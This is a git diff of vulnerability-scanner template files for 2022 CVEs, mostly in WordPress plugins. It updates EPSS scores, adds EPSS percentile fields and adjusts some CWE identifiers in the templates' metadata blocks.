cwe-id: CWE-79
- epss-score: 0.00119
+ epss-score: 0.00141
cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49173
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml
index 5ed5c1c45a..d39700010b 100644
--- a/http/cves/2022/CVE-2022-0346.yaml
+++ b/http/cves/2022/CVE-2022-0346.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00099
cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40272
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml
index e2318a9e01..7f2829e256 100644
--- a/http/cves/2022/CVE-2022-0349.yaml
+++ b/http/cves/2022/CVE-2022-0349.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0349
cwe-id: CWE-89
- epss-score: 0.01125
+ epss-score: 0.01307
cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.84219
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml
index 756811931f..3a7d249aec 100644
--- a/http/cves/2022/CVE-2022-0378.yaml
+++ b/http/cves/2022/CVE-2022-0378.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-0378
cwe-id: CWE-79
- epss-score: 0.00133
+ epss-score: 0.001
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40521
metadata:
max-request: 1
shodan-query: http.favicon.hash:780351152
diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml
index d298aec59f..b947d1e954 100644
--- a/http/cves/2022/CVE-2022-0381.yaml
+++ b/http/cves/2022/CVE-2022-0381.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0381
cwe-id: CWE-79
- epss-score: 0.00216
+ epss-score: 0.00218
cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.59071
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml
index f44c52e493..991f545c34 100644
--- a/http/cves/2022/CVE-2022-0412.yaml
+++ b/http/cves/2022/CVE-2022-0412.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0412
cwe-id: CWE-89
- epss-score: 0.01165
+ epss-score: 0.02963
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89567
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml
index 20bcd04254..37acb2092a 100644
--- a/http/cves/2022/CVE-2022-0415.yaml
+++ b/http/cves/2022/CVE-2022-0415.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-0415
- cwe-id: CWE-434,CWE-20
+ cwe-id: CWE-20,CWE-434
epss-score: 0.27369
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96168
metadata:
max-request: 6
verified: true
diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml
index 4af20091fd..d8be0fb28b 100644
--- a/http/cves/2022/CVE-2022-0422.yaml
+++ b/http/cves/2022/CVE-2022-0422.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0422
cwe-id: CWE-79
- epss-score: 0.00113
+ epss-score: 0.00133
cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml
index 6ebceb6887..245596be85 100644
--- a/http/cves/2022/CVE-2022-0432.yaml
+++ b/http/cves/2022/CVE-2022-0432.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0432
cwe-id: CWE-1321
- epss-score: 0.00112
+ epss-score: 0.001
cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40521
metadata:
max-request: 1
vendor: joinmastodon
diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml
index e53a7af4b3..993d86e3bd 100644
--- a/http/cves/2022/CVE-2022-0434.yaml
+++ b/http/cves/2022/CVE-2022-0434.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0434
cwe-id: CWE-89
- epss-score: 0.02077
+ epss-score: 0.02274
cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88217
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml
index 8a6205c25a..2543e0ad21 100644
--- a/http/cves/2022/CVE-2022-0437.yaml
+++ b/http/cves/2022/CVE-2022-0437.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0437
cwe-id: CWE-79
- epss-score: 0.00112
+ epss-score: 0.001
cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.40521
metadata:
max-request: 2
framework: node.js
diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml
index cd17e0fa87..5a1e1f6a07 100644
--- a/http/cves/2022/CVE-2022-0441.yaml
+++ b/http/cves/2022/CVE-2022-0441.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0441
cwe-id: CWE-269
- epss-score: 0.11246
+ epss-score: 0.37209
cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.96672
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml
index 07fa4965d6..aaa714f008 100644
--- a/http/cves/2022/CVE-2022-0482.yaml
+++ b/http/cves/2022/CVE-2022-0482.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2022-0482
cwe-id: CWE-359,CWE-863
- epss-score: 0.01927
+ epss-score: 0.02425
cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88566
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml
index 5a6c10410b..84ac33bc47 100644
--- a/http/cves/2022/CVE-2022-0535.yaml
+++ b/http/cves/2022/CVE-2022-0535.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00112
cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.43647
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml
index 16e27e277f..3a4b92fee9 100644
--- a/http/cves/2022/CVE-2022-0540.yaml
+++ b/http/cves/2022/CVE-2022-0540.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0540
cwe-id: CWE-287
- epss-score: 0.16173
+ epss-score: 0.16241
cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95289
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml
index dd2bf1faa7..7cb7db8bb6 100644
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00694
cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.77706
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml
index 4b071dd996..7aa8b9dcb2 100644
--- a/http/cves/2022/CVE-2022-0594.yaml
+++ b/http/cves/2022/CVE-2022-0594.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-0594
cwe-id: CWE-863
- epss-score: 0.00243
+ epss-score: 0.00257
cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.62773
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml
index df3d2fcba4..1092e3601b 100644
--- a/http/cves/2022/CVE-2022-0595.yaml
+++ b/http/cves/2022/CVE-2022-0595.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.48139
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml
index 0ab59c3d88..f390b778a7 100644
--- a/http/cves/2022/CVE-2022-0599.yaml
+++ b/http/cves/2022/CVE-2022-0599.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml
index 9f398288f7..03f80548a9 100644
--- a/http/cves/2022/CVE-2022-0653.yaml
+++ b/http/cves/2022/CVE-2022-0653.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0653
cwe-id: CWE-79
- epss-score: 0.00232
+ epss-score: 0.00274
cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.64008
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml
index 6ad4967e5d..4a69a25efb 100644
--- a/http/cves/2022/CVE-2022-0656.yaml
+++ b/http/cves/2022/CVE-2022-0656.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-0656
cwe-id: CWE-552
- epss-score: 0.0057
+ epss-score: 0.00641
cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.76583
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/udraw"
diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml
index 703f84eac7..b095be07cf 100644
--- a/http/cves/2022/CVE-2022-0660.yaml
+++ b/http/cves/2022/CVE-2022-0660.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-0660
cwe-id: CWE-209
- epss-score: 0.00596
+ epss-score: 0.00654
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.76848
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml
index 07c9a9f90f..2b315491d1 100644
--- a/http/cves/2022/CVE-2022-0678.yaml
+++ b/http/cves/2022/CVE-2022-0678.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0678
cwe-id: CWE-79
- epss-score: 0.00145
+ epss-score: 0.00135
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.4804
metadata:
max-request: 1
shodan-query: http.favicon.hash:780351152
diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml
index 2074cfb247..ba00e54bfa 100644
--- a/http/cves/2022/CVE-2022-0679.yaml
+++ b/http/cves/2022/CVE-2022-0679.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0679
cwe-id: CWE-22
- epss-score: 0.01408
+ epss-score: 0.02484
cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88704
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml
index ccd4ee59c5..4f91798038 100644
--- a/http/cves/2022/CVE-2022-0692.yaml
+++ b/http/cves/2022/CVE-2022-0692.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0692
cwe-id: CWE-601
- epss-score: 0.00112
+ epss-score: 0.00133
cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47722
metadata:
max-request: 1
vendor: alltube_project
diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml
index 65fcef0bbf..8492801723 100644
--- a/http/cves/2022/CVE-2022-0693.yaml
+++ b/http/cves/2022/CVE-2022-0693.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0693
cwe-id: CWE-89
- epss-score: 0.01065
+ epss-score: 0.01196
cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83424
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml
index 987a9dc512..e2d925e747 100644
--- a/http/cves/2022/CVE-2022-0735.yaml
+++ b/http/cves/2022/CVE-2022-0735.yaml
@@ -10,13 +10,15 @@ info:
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
- https://nvd.nist.gov/vuln/detail/cve-2022-0735
+ - https://gitlab.com/gitlab-org/gitlab/-/issues/353529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0735
cwe-id: CWE-863
- epss-score: 0.04365
+ epss-score: 0.02744
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.89212
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml
index 490bbfb971..b18b618fe2 100644
--- a/http/cves/2022/CVE-2022-0747.yaml
+++ b/http/cves/2022/CVE-2022-0747.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.011
cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82632
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml
index 8872c77b35..92f801bb28 100644
--- a/http/cves/2022/CVE-2022-0760.yaml
+++ b/http/cves/2022/CVE-2022-0760.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.011
cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.82632
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml
index 3f4be89774..13457ff347 100644
--- a/http/cves/2022/CVE-2022-0769.yaml
+++ b/http/cves/2022/CVE-2022-0769.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0769
cwe-id: CWE-89
- epss-score: 0.01065
+ epss-score: 0.01196
cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83424
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml
index d80b89ba7c..e0909bbeb6 100644
--- a/http/cves/2022/CVE-2022-0773.yaml
+++ b/http/cves/2022/CVE-2022-0773.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0773
cwe-id: CWE-89
- epss-score: 0.01851
+ epss-score: 0.02077
cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml
index 53f40cadb9..684aa7d044 100644
--- a/http/cves/2022/CVE-2022-0776.yaml
+++ b/http/cves/2022/CVE-2022-0776.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0776
cwe-id: CWE-79
- epss-score: 0.00113
+ epss-score: 0.00133
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.47722
metadata:
framework: node.js
vendor: revealjs
diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml
index 190204e8b0..94a215e90f 100644
--- a/http/cves/2022/CVE-2022-0781.yaml
+++ b/http/cves/2022/CVE-2022-0781.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0781
cwe-id: CWE-89
- epss-score: 0.00866
+ epss-score: 0.00974
cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.81449
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml
index 0c658032ab..23529ec3f8 100644
--- a/http/cves/2022/CVE-2022-0784.yaml
+++ b/http/cves/2022/CVE-2022-0784.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.02077
cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml
index 0420b71b6d..d5b4749746 100644
--- a/http/cves/2022/CVE-2022-0785.yaml
+++ b/http/cves/2022/CVE-2022-0785.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.02077
cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml
index d07aeb4e4d..ccd60d3676 100644
--- a/http/cves/2022/CVE-2022-0786.yaml
+++ b/http/cves/2022/CVE-2022-0786.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0786
cwe-id: CWE-89
- epss-score: 0.01515
+ epss-score: 0.01851
cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8685
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml
index 25c76b7739..f4bda69744 100644
--- a/http/cves/2022/CVE-2022-0788.yaml
+++ b/http/cves/2022/CVE-2022-0788.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0788
cwe-id: CWE-89
- epss-score: 0.01851
+ epss-score: 0.02077
cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml
index 059e7e0130..5e645496b8 100644
--- a/http/cves/2022/CVE-2022-0817.yaml
+++ b/http/cves/2022/CVE-2022-0817.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
- epss-score: 0.01851
+ epss-score: 0.02077
cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml
index 15645430ed..e360594d7a 100644
--- a/http/cves/2022/CVE-2022-0824.yaml
+++ b/http/cves/2022/CVE-2022-0824.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-0824
cwe-id: CWE-284,CWE-863
- epss-score: 0.97237
+ epss-score: 0.97243
cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99757
metadata:
max-request: 2
vendor: webmin
diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml
index 4bd61d6c53..e163be81cc 100644
--- a/http/cves/2022/CVE-2022-0826.yaml
+++ b/http/cves/2022/CVE-2022-0826.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0826
cwe-id: CWE-89
- epss-score: 0.01851
+ epss-score: 0.02077
cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml
index 9945439c91..764ceb9e4f 100644
--- a/http/cves/2022/CVE-2022-0827.yaml
+++ b/http/cves/2022/CVE-2022-0827.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0827
cwe-id: CWE-89
- epss-score: 0.01515
+ epss-score: 0.01851
cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8685
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml
index 6790fad535..341df2de26 100644
--- a/http/cves/2022/CVE-2022-0846.yaml
+++ b/http/cves/2022/CVE-2022-0846.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.02077
cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml
index 281b3fea4c..b29c5dbf42 100644
--- a/http/cves/2022/CVE-2022-0864.yaml
+++ b/http/cves/2022/CVE-2022-0864.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00359
cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.68676
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml
index 0e33884110..c696eec7a9 100644
--- a/http/cves/2022/CVE-2022-0867.yaml
+++ b/http/cves/2022/CVE-2022-0867.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0867
cwe-id: CWE-89
- epss-score: 0.03029
+ epss-score: 0.04152
cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9107
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml
index 20efbcbb1e..069c9c202c 100644
--- a/http/cves/2022/CVE-2022-0869.yaml
+++ b/http/cves/2022/CVE-2022-0869.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-0869
cwe-id: CWE-601
- epss-score: 0.0013
+ epss-score: 0.00153
cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:*
+ epss-percentile: 0.50846
metadata:
max-request: 4
vendor: spirit-project
diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml
index 1d8c058b78..6da70761f6 100644
--- a/http/cves/2022/CVE-2022-0870.yaml
+++ b/http/cves/2022/CVE-2022-0870.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-0870
cwe-id: CWE-918
- epss-score: 0.00185
+ epss-score: 0.00218
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
+ epss-percentile: 0.59068
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml
index e0f1401c08..8943389aa0 100644
--- a/http/cves/2022/CVE-2022-0885.yaml
+++ b/http/cves/2022/CVE-2022-0885.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0885
- cwe-id: CWE-94
- epss-score: 0.02711
+ cwe-id: CWE-862
+ epss-score: 0.13941
cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94944
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml
index aff15180a8..1cd4c897ca 100644
--- a/http/cves/2022/CVE-2022-0928.yaml
+++ b/http/cves/2022/CVE-2022-0928.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00192
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55945
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml
index 4c36fcde3d..391c27287a 100644
--- a/http/cves/2022/CVE-2022-0948.yaml
+++ b/http/cves/2022/CVE-2022-0948.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-0948
cwe-id: CWE-89
- epss-score: 0.04066
+ epss-score: 0.03849
cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90743
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml
index 6e6fd9d723..e795098e19 100644
--- a/http/cves/2022/CVE-2022-0949.yaml
+++ b/http/cves/2022/CVE-2022-0949.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.02077
cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87641
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml
index f55b9be861..f5a9b6a037 100644
--- a/http/cves/2022/CVE-2022-0952.yaml
+++ b/http/cves/2022/CVE-2022-0952.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-0952
cwe-id: CWE-352
- epss-score: 0.01735
+ epss-score: 0.03442
cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90248
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml
index b7f8b3cd6a..e317c298ce 100644
--- a/http/cves/2022/CVE-2022-0954.yaml
+++ b/http/cves/2022/CVE-2022-0954.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00192
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55945
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml
index 71e2ac58d7..8499f7077f 100644
--- a/http/cves/2022/CVE-2022-0963.yaml
+++ b/http/cves/2022/CVE-2022-0963.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00192
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55945
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml
index 3af98a9ab4..b91204eabe 100644
--- a/http/cves/2022/CVE-2022-0968.yaml
+++ b/http/cves/2022/CVE-2022-0968.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-190
epss-score: 0.00091
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
